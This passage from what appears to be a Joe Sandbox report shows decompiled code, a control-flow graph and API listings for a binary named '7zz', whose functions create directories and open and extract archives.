							E00401E9A(_t50 - 0x18, 3);
							 *((intOrPtr*)(_t50 - 4)) = 0;
							if(L0040B863(_t50 - 0x18) == 0) {
								E00407A18( *(_t50 - 0x18));
								goto L8;
							} else {
								_t23 = CreateDirectoryW( *(_t50 - 0x18), 0);
								_t19 = E00407A18( *(_t50 - 0x18)) & 0xffffff00 | _t23 != 0x00000000;
							}
						}
					} else {
						_t19 = 1;
					}
				} else {
					_t26 = E00409CBC( *((intOrPtr*)(E00409AD5(_t50 - 0x24, __ecx))));
					E00407A18( *((intOrPtr*)(_t50 - 0x24)));
					_t19 = _t26;
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t50 - 0xc));
				return _t19;
			}









                                                                                                                                    0x00409cd0
                                                                                                                                    0x00409cdb
                                                                                                                                    0x00409ce5
                                                                                                                                    0x00409d0f
                                                                                                                                    0x00409d13
                                                                                                                                    0x00409d24
                                                                                                                                    0x00409d6b
                                                                                                                                    0x00409d6b
                                                                                                                                    0x00409d26
                                                                                                                                    0x00409d2b
                                                                                                                                    0x00409d2e
                                                                                                                                    0x00409d31
                                                                                                                                    0x00409d34
                                                                                                                                    0x00409d3e
                                                                                                                                    0x00409d48
                                                                                                                                    0x00409d65
                                                                                                                                    0x00000000
                                                                                                                                    0x00409d4a
                                                                                                                                    0x00409d4e
                                                                                                                                    0x00409d5d
                                                                                                                                    0x00409d5d
                                                                                                                                    0x00409d48
                                                                                                                                    0x00409d15
                                                                                                                                    0x00409d15
                                                                                                                                    0x00409d15
                                                                                                                                    0x00409ce7
                                                                                                                                    0x00409cf3
                                                                                                                                    0x00409cfd
                                                                                                                                    0x00409d03
                                                                                                                                    0x00409d03
                                                                                                                                    0x00409d73
                                                                                                                                    0x00409d7b

                                                                                                                                    APIs
                                                                                                                                    • __EH_prolog.LIBCMT ref: 00409CD0
                                                                                                                                    • CreateDirectoryW.KERNELBASE(?,00000000,0000005C,?,00000000), ref: 00409D0F
                                                                                                                                      • Part of subcall function 00409AD5: __EH_prolog.LIBCMT ref: 00409ADA
                                                                                                                                      • Part of subcall function 00409AD5: AreFileApisANSI.KERNEL32(?,?,?,?,?,00000000), ref: 00409AF6
                                                                                                                                      • Part of subcall function 00409CBC: CreateDirectoryA.KERNEL32(?,00000000,00409CF8,0000005C,?,00000000), ref: 00409CBF
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000D.00000002.403451683.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 0000000D.00000002.403374753.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403832158.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403852206.000000000048A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403864312.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403884877.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403936872.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403953714.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403976635.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_13_2_400000_7zz.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CreateDirectoryH_prolog$ApisFile
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 299956159-0
                                                                                                                                    • Opcode ID: c1ed0e35f6580321ac6531ab909d6ea8b72f2d8cf8691d9e8c9056453fa2db36
                                                                                                                                    • Instruction ID: 5baa69c7bf3f06f08d1d002de2e3150f630ab666195b0682027b480874592da2
                                                                                                                                    • Opcode Fuzzy Hash: c1ed0e35f6580321ac6531ab909d6ea8b72f2d8cf8691d9e8c9056453fa2db36
                                                                                                                                    • Instruction Fuzzy Hash: 17119032E441059ACB14AFA5E8825AEBB79AF80314F10443FE405B32D2CB380E459BA9
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 00415D31 Relevance: 6.0, APIs: 1, Strings: 2, Instructions: 726COMMON
                                                                                                                                    Download Yara Rule

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 2149 415d31-415d94 __EH_prolog call 404ad0 2152 415d96-415d99 2149->2152 2153 415d9b-415d9e 2149->2153 2154 415da1-415da8 2152->2154 2153->2154 2155 415e28-415e3e call 4079f2 2154->2155 2156 415daa-415dc7 call 40351a 2154->2156 2161 415e40-415e47 call 41669f 2155->2161 2162 415e73 2155->2162 2163 415dc9-415de1 call 40b431 2156->2163 2164 415ded-415e26 call 42389f call 407a18 2156->2164 2168 415e75-415e80 2161->2168 2162->2168 2177 415de3-415deb 2163->2177 2178 415e49-415e59 call 46b8f4 2163->2178 2164->2155 2164->2156 2169 415e82-415e84 2168->2169 2170 415e88-415ed4 2168->2170 2169->2170 2175 415f10-415f16 2170->2175 2176 415ed6-415eea 2170->2176 2181 415f1c-415f3c call 40351a 2175->2181 2182 4163df-416441 2175->2182 2176->2175 2190 415eec-415ef1 2176->2190 2177->2164 2183 415e5e-415e6e call 46b8f4 2177->2183 2178->2183 2192 415f4f-415f61 call 40b431 2181->2192 2193 415f3e-415f4d 2181->2193 2184 416443-416445 2182->2184 2185 416449-416458 call 408604 2182->2185 2183->2162 2184->2185 2199 41645a-416468 2185->2199 2195 415ef3-415ef5 2190->2195 2196 415ef9-415f0b call 408604 2190->2196 2203 415f67-415f6f 2192->2203 2204 41668a-41669a call 46b8f4 2192->2204 2197 415f75-415f90 2193->2197 2195->2196 2196->2199 2208 415f96-415fd7 call 4033db call 404ad0 call 40862d call 443f76 2197->2208 2209 41646b-416479 call 407a18 2197->2209 2203->2197 2203->2204 2225 416118-41613f call 418a23 2208->2225 2226 415fdd-415fe5 2208->2226 2214 416481-416484 2209->2214 2215 41647b-41647d 2209->2215 2218 416674-416685 call 408604 2214->2218 2215->2214 2218->2199 2231 416145-41616f call 46c55c 2225->2231 2232 416489-4164b2 call 408604 call 403411 call 407a18 2225->2232 2226->2225 2228 415feb-415fed 2226->2228 2230 415ff1-415ff5 2228->2230 2233 415ff7-415ff9 2230->2233 2234 415fff-416006 2230->2234 2248 416175-416178 2231->2248 2249 4164c4-4164ed call 408604 call 403411 call 407a18 2231->2249 2258 4164b4-4164b6 2232->2258 2259 4164ba-4164bf 2232->2259 2236 416008 2233->2236 2237 415ffb-415ffd 2233->2237 2238 41600c-41600f 2234->2238 2236->2238 2237->2230 2238->2225 2241 416015-41603b call 4072c9 call 417651 2238->2241 2256 416041-416050 call 408053 2241->2256 2257 41610b-416117 call 407a18 2241->2257 2253 4163a8-4163d9 call 408604 call 403411 call 407a18 2248->2253 2254 41617e-416183 2248->2254 2289 4164f5-4164f8 2249->2289 2290 4164ef-4164f1 2249->2290 2253->2181 2253->2182 2262 416213 2254->2262 2263 416189-416192 2254->2263 2256->2257 2277 416056-41608a call 407399 call 401e26 call 407a18 2256->2277 2257->2225 2258->2259 2259->2218 2266 416219 2262->2266 2263->2266 2269 416198-4161b1 call 40373d 2263->2269 2272 416247-41626f call 401e9a 2266->2272 2273 41621b-416241 2266->2273 2284 4161b3-4161b9 2269->2284 2285 416205-416211 2269->2285 2298 416275-416278 2272->2298 2299 416536-416568 call 407a18 call 408604 call 403411 call 407a18 2272->2299 2273->2272 2294 4164fd-416526 call 408604 call 403411 call 407a18 2273->2294 2277->2257 2320 41608c-41608f 2277->2320 2284->2285 2292 4161bb-416202 call 408784 2284->2292 2285->2262 2285->2269 2289->2218 2290->2289 2292->2285 2333 416528-41652a 2294->2333 2334 41652e-416531 2294->2334 2303 416291-41629c 2298->2303 2304 41627a-41628b 2298->2304 2360 416570-416573 2299->2360 2361 41656a-41656c 2299->2361 2310 4162d5-4162e7 2303->2310 2311 41629e-4162ad 2303->2311 2304->2303 2325 416578-4165aa call 407a18 call 408604 call 403411 call 407a18 2304->2325 2321 4162f3 2310->2321 2322 4162e9-4162ec 2310->2322 2318 4162c7-4162d3 2311->2318 2319 4162af-4162c1 2311->2319 2318->2310 2318->2311 2319->2318 2341 4165ba-4165ec call 407a18 call 408604 call 403411 call 407a18 2319->2341 2328 416093-416097 2320->2328 2324 4162f5-416332 call 416922 2321->2324 2322->2321 2329 4162ee-4162f1 2322->2329 2339 416337-41633c 2324->2339 2384 4165b2-4165b5 2325->2384 2385 4165ac-4165ae 2325->2385 2336 4160a1-4160a5 2328->2336 2337 416099-41609b 2328->2337 2329->2324 2333->2334 2334->2218 2344 4160aa-4160ac 2336->2344 2342 4160a7 2337->2342 2343 41609d-41609f 2337->2343 2347 416342-416347 2339->2347 2348 4165f9-41662b call 407a18 call 408604 call 403411 call 407a18 2339->2348 2396 4165f4-4165f7 2341->2396 2397 4165ee-4165f0 2341->2397 2342->2344 2343->2328 2344->2257 2345 4160ae-4160e2 call 4072c9 call 417651 call 407a18 2344->2345 2345->2257 2390 4160e4-4160f3 call 40807a 2345->2390 2354 416369-41636c 2347->2354 2355 416349-416367 2347->2355 2400 416633-416636 2348->2400 2401 41662d-41662f 2348->2401 2362 41636f-41639c 2354->2362 2355->2362 2360->2218 2361->2360 2367 4163a2-4163a7 call 407a18 2362->2367 2368 416638-416667 call 407a18 call 408604 call 403411 call 407a18 2362->2368 2367->2253 2406 416669-41666b 2368->2406 2407 41666f 2368->2407 2384->2218 2385->2384 2390->2257 2403 4160f5-416106 call 415c6d * 2 2390->2403 2396->2218 2397->2396 2400->2218 2401->2400 2403->2257 2406->2407 2407->2218
                                                                                                                                    C-Code - Quality: 87%
                                                                                                                                    			E00415D31(intOrPtr __ecx, signed int __edx, void* __eflags) {
				signed int _t453;
				signed int _t454;
				intOrPtr _t465;
				signed int _t468;
				signed int _t477;
				intOrPtr* _t485;
				signed int _t486;
				signed int _t487;
				signed char _t491;
				signed int _t496;
				intOrPtr _t505;
				signed int _t509;
				signed int _t519;
				signed int _t532;
				signed int _t539;
				signed int _t540;
				signed int _t544;
				intOrPtr _t553;
				intOrPtr _t554;
				intOrPtr _t563;
				signed int _t565;
				signed int _t573;
				signed int* _t581;
				signed int _t582;
				signed int _t589;
				signed int _t601;
				short* _t602;
				signed int _t610;
				signed int _t612;
				void* _t614;
				signed int _t617;
				signed int _t618;
				signed int _t620;
				void* _t623;
				signed int _t626;
				signed int* _t631;
				signed int _t632;
				signed int _t661;
				char* _t662;
				signed int _t669;
				intOrPtr* _t670;
				intOrPtr* _t671;
				intOrPtr* _t672;
				intOrPtr _t714;
				signed int* _t724;
				signed int _t747;
				void* _t748;
				intOrPtr _t756;
				signed int _t770;
				signed int _t771;
				signed int _t780;
				signed int _t785;
				signed int _t786;
				signed int _t788;
				signed int _t790;
				void* _t791;

				_t770 = __edx;
				L0046B890(E004749BF, _t791);
				_t780 =  *(_t791 + 0x24);
				 *((intOrPtr*)(_t791 - 0x34)) = __ecx;
				 *((intOrPtr*)(_t791 - 0x4c)) = __edx;
				 *((intOrPtr*)(_t780 + 0x20)) = 0;
				 *((intOrPtr*)(_t780 + 0x18)) = 0;
				 *((intOrPtr*)(_t780 + 0x10)) = 0;
				 *((intOrPtr*)(_t780 + 8)) = 0;
				 *_t780 = 0;
				 *((intOrPtr*)(_t780 + 0x24)) = 0;
				 *((intOrPtr*)(_t780 + 0x1c)) = 0;
				 *((intOrPtr*)(_t780 + 0x14)) = 0;
				 *((intOrPtr*)(_t780 + 0xc)) = 0;
				 *(_t780 + 4) = 0;
				 *((intOrPtr*)(_t780 + 0x28)) = 0;
				 *(_t791 - 0x18) = 0;
				 *(_t791 - 0x14) = 0;
				E00404AD0(_t791 - 0xe8, 8);
				 *((intOrPtr*)(_t791 - 0xe8)) = 0x47a688;
				 *(_t791 - 4) = 0;
				if( *( *(_t791 + 0x14)) == 0) {
					_t453 =  *( *((intOrPtr*)(_t791 + 8)) + 8);
				} else {
					_t453 = 1;
				}
				_t785 = 0;
				 *(_t791 - 0x24) = _t453;
				if(_t453 <= 0) {
					L8:
					_push(0xf8);
					_t454 = L004079F2();
					_t661 = _t454;
					 *(_t791 + 0x24) = _t661;
					 *(_t791 - 4) = 2;
					if(_t661 == 0) {
						goto L12;
					} else {
						L112();
						_t786 = _t454;
					}
				} else {
					do {
						L0040351A(_t791 - 0x70);
						 *(_t791 - 4) = 1;
						 *(_t791 - 0x98) = 0;
						 *((intOrPtr*)(_t791 - 0x94)) = 0;
						_t801 =  *( *(_t791 + 0x14));
						if( *( *(_t791 + 0x14)) != 0) {
							goto L7;
						} else {
							_push( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t791 + 8)) + 0xc)) + _t785 * 4)))));
							if(E0040B431(_t791 - 0x98, _t770, _t801) == 0) {
								 *(_t791 + 0x14) = "there is no such archive";
								L0046B8F4(_t791 + 0x14, 0x47cf70);
								L11:
								 *(_t791 + 0x14) = "can\'t decompress folder";
								L0046B8F4(_t791 + 0x14, 0x47cf70);
								L12:
								_t786 = 0;
								__eflags = 0;
							} else {
								if(( *(_t791 - 0x78) >> 0x00000004 & 0x00000001) != 0) {
									goto L11;
								} else {
									goto L7;
								}
							}
						}
						goto L13;
						L7:
						L0042389F(_t791 - 0xe8,  *(_t791 - 0x98),  *((intOrPtr*)(_t791 - 0x94)));
						 *(_t791 - 0x18) =  *(_t791 - 0x18) +  *(_t791 - 0x98);
						 *(_t791 - 4) = 0;
						asm("adc [ebp-0x14], ecx");
						E00407A18( *((intOrPtr*)(_t791 - 0x70)));
						_t785 = _t785 + 1;
					} while (_t785 <  *(_t791 - 0x24));
					goto L8;
				}
				L13:
				 *(_t791 - 4) = 0;
				 *(_t791 - 0xec) = _t786;
				if(_t786 != 0) {
					 *((intOrPtr*)( *_t786 + 4))(_t786);
				}
				_t662 =  *(_t791 + 0x14);
				 *(_t791 - 4) = 3;
				_t771 = _t770 & 0xffffff00 |  *(_t791 - 0x24) - 0x00000001 > 0x00000000;
				 *((intOrPtr*)(_t786 + 0xe8)) = 0;
				 *((intOrPtr*)(_t786 + 0xe0)) = 0;
				 *((intOrPtr*)(_t786 + 0xd8)) = 0;
				 *(_t786 + 0xbb) = _t771;
				 *(_t786 + 0x30) = _t662[8];
				 *(_t786 + 0x34) = _t662[0xc];
				 *((intOrPtr*)(_t786 + 0xec)) = 0;
				 *((intOrPtr*)(_t786 + 0xe4)) = 0;
				 *((intOrPtr*)(_t786 + 0xdc)) = 0;
				 *((intOrPtr*)(_t786 + 0xf0)) = 0;
				if(_t771 == 0) {
					L20:
					__eflags =  *(_t791 - 0x24);
					 *(_t791 - 0x20) = 0;
					if( *(_t791 - 0x24) <= 0) {
						L79:
						__eflags = _t786;
						 *((intOrPtr*)(_t780 + 0x18)) =  *((intOrPtr*)(_t786 + 0xd8));
						 *((intOrPtr*)(_t780 + 0x1c)) =  *((intOrPtr*)(_t786 + 0xdc));
						 *((intOrPtr*)(_t780 + 0x20)) =  *((intOrPtr*)(_t786 + 0xe0));
						 *((intOrPtr*)(_t780 + 0x24)) =  *((intOrPtr*)(_t786 + 0xe4));
						 *((intOrPtr*)(_t780 + 8)) =  *((intOrPtr*)(_t786 + 0xe8));
						 *((intOrPtr*)(_t780 + 0xc)) =  *((intOrPtr*)(_t786 + 0xec));
						 *((intOrPtr*)(_t780 + 0x28)) =  *((intOrPtr*)(_t786 + 0xf0));
						 *(_t791 - 4) = 0;
						asm("cdq");
						 *_t780 =  *( *((intOrPtr*)(_t791 + 8)) + 8);
						 *(_t780 + 4) = _t771;
						_t465 =  *((intOrPtr*)(_t786 + 0xd0));
						 *((intOrPtr*)(_t780 + 0x10)) =  *((intOrPtr*)(_t465 + 0x20));
						 *((intOrPtr*)(_t780 + 0x14)) =  *((intOrPtr*)(_t465 + 0x24));
						if(_t786 != 0) {
							 *((intOrPtr*)( *_t786 + 8))(_t786);
						}
						 *(_t791 - 4) =  *(_t791 - 4) | 0xffffffff;
						E00408604(_t791 - 0xe8);
						_t468 = 0;
						__eflags = 0;
						goto L82;
					} else {
						do {
							 *(_t791 + 0x24) =  *( *((intOrPtr*)( *((intOrPtr*)(_t791 + 8)) + 0xc)) +  *(_t791 - 0x20) * 4);
							L0040351A(_t791 - 0x70);
							 *(_t791 - 4) = 4;
							__eflags =  *( *(_t791 + 0x14));
							if(__eflags == 0) {
								_t669 = _t791 - 0x98;
								_push( *( *(_t791 + 0x24)));
								_t477 = E0040B431(_t669, _t771, __eflags);
								__eflags = _t477;
								if(_t477 == 0) {
									L111:
									 *(_t791 + 0x14) = "there is no such archive";
									L0046B8F4(_t791 + 0x14, 0x47cf70);
									L0046B890(E00474A50, _t791);
									_push(_t669);
									_push(_t669);
									_push(0);
									_push(_t786);
									_t788 = _t669;
									_push(_t780);
									 *(_t791 - 0x10) = _t788;
									 *_t788 = 0x47ab60;
									 *((intOrPtr*)(_t788 + 4)) = 0x47a78c;
									 *((intOrPtr*)(_t788 + 8)) = 0x47ab50;
									 *((intOrPtr*)(_t788 + 0xc)) = 0;
									 *((intOrPtr*)(_t788 + 0x18)) = 0;
									 *(_t791 - 4) = 0;
									 *((intOrPtr*)(_t788 + 0x1c)) = 0;
									 *((intOrPtr*)(_t788 + 0x20)) = 0;
									_t670 = _t788 + 0x24;
									 *(_t791 - 4) = 2;
									 *_t670 = 0;
									 *((intOrPtr*)(_t670 + 4)) = 0;
									 *((intOrPtr*)(_t670 + 8)) = 0;
									E00401E9A(_t670, 3);
									_t671 = _t788 + 0x38;
									 *(_t791 - 4) = 3;
									 *_t671 = 0;
									 *((intOrPtr*)(_t671 + 4)) = 0;
									 *((intOrPtr*)(_t671 + 8)) = 0;
									E00401E9A(_t671, 3);
									_t672 = _t788 + 0x44;
									 *(_t791 - 4) = 4;
									 *_t672 = 0;
									 *((intOrPtr*)(_t672 + 4)) = 0;
									 *((intOrPtr*)(_t672 + 8)) = 0;
									E00401E9A(_t672, 3);
									 *((char*)(_t788 + 0x5a)) = 1;
									 *((char*)(_t788 + 0x5b)) = 1;
									 *((char*)(_t788 + 0x5c)) = 1;
									 *((intOrPtr*)(_t788 + 0x98)) = 0;
									 *((intOrPtr*)(_t788 + 0xa0)) = 0;
									_t485 = _t788 + 0xa4;
									 *((intOrPtr*)(_t485 + 4)) = 0;
									 *((intOrPtr*)(_t485 + 8)) = 0;
									 *((intOrPtr*)(_t485 + 0xc)) = 0;
									 *((intOrPtr*)(_t485 + 0x10)) = 4;
									 *_t485 = 0x47a420;
									_t782 = _t788 + 0xbc;
									 *((char*)(_t788 + 0xbb)) = 0;
									 *((intOrPtr*)(_t788 + 0xbc)) = 0;
									_push(0x38);
									 *(_t791 - 4) = 9;
									 *_t788 = 0x47ab30;
									 *((intOrPtr*)(_t788 + 4)) = 0x47ab20;
									 *((intOrPtr*)(_t788 + 8)) = 0x47ab10;
									_t486 = L004079F2();
									 *(_t791 - 0x14) = _t486;
									__eflags = _t486;
									 *(_t791 - 4) = 0xa;
									if(_t486 == 0) {
										_t487 = 0;
										__eflags = 0;
									} else {
										_t487 = L0040F3E5(_t486);
									}
									 *(_t791 - 4) = 9;
									 *((intOrPtr*)(_t788 + 0xd0)) = _t487;
									E0040C9B4(_t782, _t487);
									 *[fs:0x0] =  *((intOrPtr*)(_t791 - 0xc));
									return _t788;
								} else {
									_t491 =  *(_t791 - 0x78) >> 4;
									__eflags = _t491 & 0x00000001;
									if((_t491 & 0x00000001) != 0) {
										goto L111;
									} else {
										goto L25;
									}
								}
							} else {
								 *(_t791 - 0x98) = 0;
								 *((intOrPtr*)(_t791 - 0x94)) = 0;
								 *(_t791 - 0x78) = 0;
								L25:
								 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t791 + 0x18)))) + 0x18))();
								_t496 =  *((intOrPtr*)( *( *(_t791 + 0x1c)) + 0x24))( *( *(_t791 + 0x24)));
								__eflags = _t496;
								 *(_t791 - 0x1c) = _t496;
								if(_t496 != 0) {
									E00407A18( *((intOrPtr*)(_t791 - 0x70)));
									__eflags = _t786;
									 *(_t791 - 4) = 0;
									if(_t786 != 0) {
										 *((intOrPtr*)( *_t786 + 8))(_t786);
									}
									_t790 =  *(_t791 - 0x1c);
									goto L110;
								} else {
									L004033DB(_t791 - 0xd4);
									 *(_t791 - 4) = 5;
									E00404AD0(_t791 - 0x48, 4);
									 *(_t791 - 4) = 6;
									 *((intOrPtr*)(_t791 - 0x48)) = 0x47a668;
									E0040862D();
									_push( *((intOrPtr*)(_t791 - 0x4c)));
									L00443F76(_t791 - 0x48);
									_t505 =  *((intOrPtr*)(_t791 - 0x4c));
									 *(_t791 - 4) = 7;
									__eflags =  *(_t505 + 8);
									if( *(_t505 + 8) == 0) {
										_t747 =  *(_t791 + 0x24);
										_t601 =  *(_t747 + 4);
										__eflags = _t601;
										if(_t601 != 0) {
											_t748 =  *_t747;
											_t602 = _t748 + _t601 * 2 - 2;
											while(1) {
												__eflags =  *_t602 - 0x2e;
												if( *_t602 == 0x2e) {
													break;
												}
												__eflags = _t602 - _t748;
												if(_t602 == _t748) {
													_t125 = _t791 - 0x10;
													 *_t125 =  *(_t791 - 0x10) | 0xffffffff;
													__eflags =  *_t125;
												} else {
													_t602 = _t602;
													continue;
												}
												L34:
												__eflags =  *(_t791 - 0x10);
												if( *(_t791 - 0x10) >= 0) {
													L004072C9( *(_t791 + 0x24), _t791 - 0x58,  *(_t791 - 0x10) + 1);
													 *(_t791 - 4) = 8;
													_t610 = L00417651( *((intOrPtr*)(_t791 - 0x34)), _t791 - 0x58);
													__eflags = _t610;
													 *(_t791 - 0x1c) = _t610;
													if(_t610 >= 0) {
														_t612 = E00408053( *((intOrPtr*)(_t791 - 0x58)), L"001");
														__eflags = _t612;
														if(_t612 == 0) {
															_t614 = L00407399( *(_t791 + 0x24), _t791 - 0x104,  *(_t791 - 0x10));
															 *(_t791 - 4) = 9;
															E00401E26(_t791 - 0x58, _t614);
															 *(_t791 - 4) = 8;
															E00407A18( *((intOrPtr*)(_t791 - 0x104)));
															_t617 =  *(_t791 - 0x54);
															__eflags = _t617;
															if(_t617 != 0) {
																_t756 =  *((intOrPtr*)(_t791 - 0x58));
																_t618 = _t756 + _t617 * 2 - 2;
																while(1) {
																	__eflags =  *_t618 - 0x2e;
																	if( *_t618 == 0x2e) {
																		break;
																	}
																	__eflags = _t618 - _t756;
																	if(_t618 == _t756) {
																		_t620 = _t618 | 0xffffffff;
																		__eflags = _t620;
																	} else {
																		_t618 = _t618;
																		continue;
																	}
																	L44:
																	__eflags = _t620;
																	if(_t620 >= 0) {
																		_t623 = L004072C9(_t791 - 0x58, _t791 - 0xf8, _t620 + 1);
																		 *(_t791 - 4) = 0xa;
																		 *(_t791 - 0x10) = L00417651( *((intOrPtr*)(_t791 - 0x34)), _t623);
																		 *(_t791 - 4) = 8;
																		E00407A18( *((intOrPtr*)(_t791 - 0xf8)));
																		__eflags =  *(_t791 - 0x10);
																		if( *(_t791 - 0x10) >= 0) {
																			_t626 = E0040807A(L"rar");
																			__eflags = _t626;
																			if(_t626 != 0) {
																				E00415C6D(_t791 - 0x48,  *(_t791 - 0x10));
																				E00415C6D(_t791 - 0x48,  *(_t791 - 0x1c));
																			}
																		}
																	}
																	goto L48;
																}
																_t620 = _t618 - _t756 >> 1;
																goto L44;
															}
														}
													}
													L48:
													 *(_t791 - 4) = 7;
													E00407A18( *((intOrPtr*)(_t791 - 0x58)));
												}
												goto L49;
											}
											 *(_t791 - 0x10) = _t602 - _t748 >> 1;
											goto L34;
										}
									}
									L49:
									_push( *((intOrPtr*)(_t791 + 0x18)));
									_push( *(_t791 + 0x24));
									_push(0);
									_push( *( *(_t791 + 0x14)));
									_push(_t791 - 0x48);
									_push( *((intOrPtr*)(_t791 - 0x34)));
									_t509 = E00418A23(_t791 - 0xd4); // executed
									__eflags = _t509 - 0x80004004;
									 *(_t791 - 0x10) = _t509;
									if(_t509 == 0x80004004) {
										 *(_t791 - 4) = 5;
										E00408604(_t791 - 0x48);
										 *(_t791 - 4) = 4;
										L00403411(_t791 - 0xd4);
										E00407A18( *((intOrPtr*)(_t791 - 0x70)));
										__eflags = _t786;
										 *(_t791 - 4) = 0;
										if(_t786 != 0) {
											 *((intOrPtr*)( *_t786 + 8))(_t786);
										}
										_t790 = 0x80004004;
										goto L110;
									} else {
										 *((char*)(_t791 - 0x9c)) =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t791 + 0x18)))) + 0x14))();
										_t771 =  *( *(_t791 + 0x1c));
										_t519 =  *((intOrPtr*)(_t771 + 0x28))( *( *(_t791 + 0x24)),  *(_t791 - 0x10),  *((intOrPtr*)(_t791 - 0x9c)));
										__eflags = _t519;
										 *(_t791 + 0x24) = _t519;
										if(_t519 != 0) {
											 *(_t791 - 4) = 5;
											E00408604(_t791 - 0x48);
											 *(_t791 - 4) = 4;
											L00403411(_t791 - 0xd4);
											E00407A18( *((intOrPtr*)(_t791 - 0x70)));
											__eflags = _t786;
											 *(_t791 - 4) = 0;
											if(_t786 != 0) {
												 *((intOrPtr*)( *_t786 + 8))(_t786);
											}
											_t790 =  *(_t791 + 0x24);
											goto L110;
										} else {
											__eflags =  *(_t791 - 0x10);
											if( *(_t791 - 0x10) != 0) {
												goto L78;
											} else {
												__eflags =  *( *(_t791 + 0x14));
												if( *( *(_t791 + 0x14)) != 0) {
													L58:
													__eflags =  *(_t791 - 0xb8);
												} else {
													__eflags =  *(_t791 - 0xb8);
													 *(_t791 - 0x10) = 0;
													if(__eflags > 0) {
														do {
															_t589 = L0040373D(_t771,  *((intOrPtr*)( *((intOrPtr*)(_t791 - 0xb4)) +  *(_t791 - 0x10) * 4)));
															__eflags = _t589;
															 *(_t791 + 0x24) = _t589;
															if(_t589 >= 0) {
																__eflags =  *(_t791 + 0x24) -  *(_t791 - 0x20);
																if( *(_t791 + 0x24) >  *(_t791 - 0x20)) {
																	 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t791 + 8)))) + 4))( *(_t791 + 0x24), 1);
																	 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t791 + 0xc)))) + 4))( *(_t791 + 0x24), 1);
																	_t201 = _t791 - 0x18;
																	 *_t201 =  *(_t791 - 0x18) -  *((intOrPtr*)( *((intOrPtr*)(_t791 - 0xdc)) +  *(_t791 + 0x24) * 8));
																	__eflags =  *_t201;
																	asm("sbb [ebp-0x14], eax");
																	E00408784(_t791 - 0xe8,  *(_t791 + 0x24), 1);
																	 *(_t791 - 0x24) =  *( *((intOrPtr*)(_t791 + 8)) + 8);
																}
															}
															 *(_t791 - 0x10) =  *(_t791 - 0x10) + 1;
															__eflags =  *(_t791 - 0x10) -  *(_t791 - 0xb8);
														} while ( *(_t791 - 0x10) <  *(_t791 - 0xb8));
														goto L58;
													}
												}
												if(__eflags == 0) {
													L61:
													 *((intOrPtr*)(_t791 - 0x30)) = 0;
													 *(_t791 - 0x2c) = 0;
													 *((intOrPtr*)(_t791 - 0x28)) = 0;
													E00401E9A(_t791 - 0x30, 3);
													 *(_t791 - 4) = 0xb;
													_t532 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t791 + 0x18)))) + 0x10))(_t791 - 0x30);
													__eflags = _t532;
													 *(_t791 + 0x24) = _t532;
													if(_t532 != 0) {
														E00407A18( *((intOrPtr*)(_t791 - 0x30)));
														 *(_t791 - 4) = 5;
														E00408604(_t791 - 0x48);
														 *(_t791 - 4) = 4;
														L00403411(_t791 - 0xd4);
														E00407A18( *((intOrPtr*)(_t791 - 0x70)));
														__eflags = _t786;
														 *(_t791 - 4) = 0;
														if(_t786 != 0) {
															 *((intOrPtr*)( *_t786 + 8))(_t786);
														}
														_t790 =  *(_t791 + 0x24);
														goto L110;
													} else {
														__eflags =  *(_t791 - 0x2c);
														if( *(_t791 - 0x2c) == 0) {
															L64:
															_t539 =  *(_t791 - 0xcc);
															 *(_t791 + 0x24) = 0;
															__eflags = _t539;
															if(_t539 <= 0) {
																L68:
																_t540 =  *( *((intOrPtr*)(_t791 - 0xc8)) + _t539 * 4 - 4);
																 *(_t791 + 0x24) = _t540;
																__eflags =  *( *(_t791 + 0x14));
																if( *( *(_t791 + 0x14)) != 0) {
																	L71:
																	__eflags = 0;
																} else {
																	__eflags =  *(_t791 - 0x74);
																	if(__eflags != 0) {
																		goto L71;
																	} else {
																		_push(1);
																		_pop(0);
																	}
																}
																 *((char*)(_t540 + 0x2c)) = 0;
																 *((intOrPtr*)(_t540 + 0x24)) =  *((intOrPtr*)(_t791 - 0x80));
																 *((intOrPtr*)(_t540 + 0x28)) =  *((intOrPtr*)(_t791 - 0x7c));
																asm("adc ecx, [ebp-0x94]");
																_t544 = E00416922( *(_t791 + 0x24),  *((intOrPtr*)(_t791 + 0x10)), __eflags,  *((intOrPtr*)(_t791 - 0xac)) +  *(_t791 - 0x98),  *(_t791 - 0xa8),  *(_t791 + 0x14),  *(_t791 + 0x1c), _t786,  *((intOrPtr*)(_t791 + 0x20)), _t791 - 0x60); // executed
																__eflags = _t544;
																 *(_t791 + 0x24) = _t544;
																if(_t544 != 0) {
																	E00407A18( *((intOrPtr*)(_t791 - 0x30)));
																	 *(_t791 - 4) = 5;
																	E00408604(_t791 - 0x48);
																	 *(_t791 - 4) = 4;
																	L00403411(_t791 - 0xd4);
